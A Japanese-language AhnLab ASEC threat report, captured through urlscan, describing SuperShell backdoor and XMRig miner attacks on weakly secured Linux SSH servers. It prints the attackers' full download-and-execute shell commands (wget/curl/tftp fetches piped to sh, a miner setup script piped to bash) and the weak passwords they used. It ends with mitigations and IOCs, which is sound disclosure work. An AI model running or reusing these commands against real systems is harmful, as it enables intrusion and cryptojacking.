asec.ahnlab.com
Open in
urlscan Pro
192.0.78.197
Public Scan
URL:
https://asec.ahnlab.com/jp/83164/
Submission: On September 21 via api from IN — Scanned from DE
Submission: On September 21 via api from IN — Scanned from DE
Form analysis
1 forms found in the DOMGET https://asec.ahnlab.com/jp/
<form method="get" class="searchform" action="https://asec.ahnlab.com/jp/">
<input type="text" value="" name="s" class="searchfield" placeholder="Search...">
<button class="searchsubmit"></button>
</form>
Text Content
* マルウェアの情報 * AhnLab 検知 * 総計 * 対応ガイド * AhnLab Menuマルウェアの情報AhnLab 検知総計対応ガイドAhnLab Posted By ATCP , 2024년 09월 19일 LINUX SSH サーバーを対象に拡散している SUPERSHELL マルウェア AhnLab Security Emergency response Center (ASEC)では最近、管理が適切に行われていない Linux SSH サーバーを対象にバックドアマルウェアである SuperShell をインストールする攻撃事例を確認した。SuperShell は中国語を使用する開発者により製作されたもので、Go 言語で開発され Windows や Linux、Android を含む様々なプラットフォームに対応している。実質的な機能はリバースシェルであり、攻撃者はこれを利用して感染システムを遠隔操作できる。 図1. Supershell の GitHub ページ 攻撃者は、複数のシステムを感染させたあと、スキャナーをインストールしたものと推定され、以下のような攻撃元から辞書攻撃によってログインを試みた。 Attacker IPID/PW209.141.60[.]249root / qwer179.61.253[.]67root / password root / a123456789 root / a1234567 root / newroot root / 123qaz!@# root / Passw0rd root / 123qweASD root / abc123 root / daniel root / 1qaz@wsx107.189.8[.]15root / doctor2.58.84[.]90root / Admin123! root / 123456qwerty root / cocacola root / qweasd!@# 表1. 攻撃元のアドレスおよびログイン試行プロセスで使用した資格情報 攻撃に成功したあとは、以下のようなコマンドを実行して直接 SuperShell をインストールするか、ダウンローダー機能を担うシェルスクリプトをインストールした。SuperShell は Web サーバーだけでなく、FTP サーバーを通じてもダウンロードされた。 # cd /tmp ; wget hxxp://45.15.143[.]197/ssh1 && chmod +x ssh1 ; ./ssh1; rm -r * # cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://45.15.143[.]197/sensi.sh; curl -O hxxp://45.15.143[.]197/sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp 45.15.143[.]197 -c get sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp -r sensi2.sh -g 45.15.143[.]197; chmod 777 sensi2.sh; sh sensi2.sh; ftpget -v -u anonymous -p anonymous -P 21 45.15.143[.]197 sensi1.sh sensi1.sh; sh sensi1.sh; rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh; rm -rf * # cd /etc ; wget hxxp://45.15.143[.]197/ssh1 && chmod +x ssh1 ; ./ssh1 ; wget hxxp://45.15.143[.]197/x64.bin ; chmod +x x64.bin ; ./x64.bin ; rm -r * # cd /tmp ; curl hxxp://45.15.143[.]197:44581/ssh1.sh | sh ; wget hxxp://45.15.143[.]197:44581/ssh1.sh ; sh ssh1.sh ; rm -r * # cd /tmp ; curl -s -L hxxps://download.c3pool[.]org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 871SNx3baWof8utKVRqJ6u5oGkXHPBv9GKMeQ99J8FxU23eKGgGMr3de7WhfwydWjCSeUGdZf5VC4J3PcPPCY1yoSFCG4xx ; wget hxxp://45.15.143[.]197:10086/supershell/compile/download/ssh1 ; chmod +x ssh1 ; ./ssh1 ; rm -r ssh1 表2. 攻撃事例で確認されたコマンド 最終的にインストールされたマルウェアは難読化されているが、少数の内部文字列と動作方式、そして実行プロセスで確認できる文字列を通じて、SuperShell バックドアであることが確認できる。 図2. 難読化された SuperShell 図3. SuperShell の実行ログ 一般的に、管理が適切に行われていない Linux システムを対象とする攻撃では XMRig のようなコインマイナーや ShellBot、Tsunami のような DDoS Bot がインストールされる傾向がある。今回確認された攻撃で、攻撃者は操作権限の奪取目的で、まず SuperShell をインストールした。もちろん SuperShell と同時に XMRig モネロコインマイナーをインストールする事例が確認されていることからも、最終目的は仮想通貨の採掘であると見られる。 871SNx3baWof8utKVRqJ6u5oGkXHPBv9GKMeQ99J8FxU23eKGgGMr3de7WhfwydWjCSeUGdZf5VC4J3PcPPCY1yoSFCG4xx 表3. 攻撃者のモネロウォレットアドレス 最近、管理が適切に行われていない Linux SSH サーバーを対象に、SuperShell バックドアがインストールされている。SuperShell がインストールされると、Linux サーバーは攻撃者のコマンドを受け取り操作権限を奪われることがある。 そのため、管理者はアカウントのパスワードを推測が困難な形式で設定し、定期的にパスワードを変更することで、総当たり攻撃や辞書攻撃から Linux サーバーを保護する必要があり、セキュリティパッチを最新にして脆弱性攻撃を防止するべきである。また、外部に公開されていてアクセスが可能なサーバーに関してはファイアウォールのようなセキュリティ製品を利用し、外部の攻撃者からのアクセスを統制しなければならない。最後に、V3 を最新バージョンにアップデートしてマルウェアへの感染を事前に遮断できるように注意を払う必要がある。 検知名 Backdoor/Linux.CobaltStrike.3753120 (2024.09.11.00) Downloader/Shell.Agent.SC203780 (2024.09.11.00) Downloader/Shell.ElfMiner.S1705 (2021.11.29.02) IOC 関連情報 MD5 4ee4f1e7456bb2b3d13e93797b9efbd3 5ab6e938028e6e9766aa7574928eb062 e06a1ba2f45ba46b892bef017113af09 URL http[:]//45[.]15[.]143[.]197/sensi[.]sh http[:]//45[.]15[.]143[.]197/ssh1 http[:]//45[.]15[.]143[.]197/x64[.]bin http[:]//45[.]15[.]143[.]197[:]10086/supershell/compile/download/ssh http[:]//45[.]15[.]143[.]197[:]44581/ssh1 追加 IoC は ATIP で提供しています。 IP 107[.]189[.]8[.]15 179[.]61[.]253[.]67 2[.]58[.]84[.]90 209[.]141[.]60[.]249 45[.]15[.]143[.]197 追加 IoC は ATIP で提供しています。 関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム 「AhnLab TIP」 サブスクリプションサービスを通して確認できる。 Categories: マルウェア, Public Tagged as: backdoor, CoinMiner, SSH, SuperShell, XMRig XMRig コインマイナーを配布する BMOF(Binary Managed Object File) (MDS 製品による検知) ARCHIVES Archives Select Month September 2024 August 2024 July 2024 June 2024 May 2024 April 2024 March 2024 February 2024 January 2024 December 2023 November 2023 October 2023 September 2023 August 2023 July 2023 June 2023 May 2023 April 2023 March 2023 February 2023 January 2023 December 2022 November 2022 October 2022 September 2022 August 2022 July 2022 June 2022 May 2022 April 2022 March 2022 February 2022 January 2022 December 2021 November 2021 October 2021 September 2021 August 2021 July 2021 June 2021 May 2021 April 2021 March 2021 February 2021 January 2021 December 2020 November 2020 September 2020 August 2020 July 2020 June 2020 May 2020 April 2020 March 2020 February 2020 December 2019 November 2019 October 2019 September 2019 August 2019 June 2019 May 2019 April 2019 March 2019 February 2019 January 2019 November 2018 August 2018 July 2018 April 2018 February 2018 * Facebook * RSS Feed FOOTER(JP) 〒108-0014 東京都港区芝4丁目13-2 田町フロントビル3階 | 個人情報保護方針 © AhnLab, Inc. All rights reserved. FAMILY SITE 한국 (한국어)Global (English)日本 (日本語)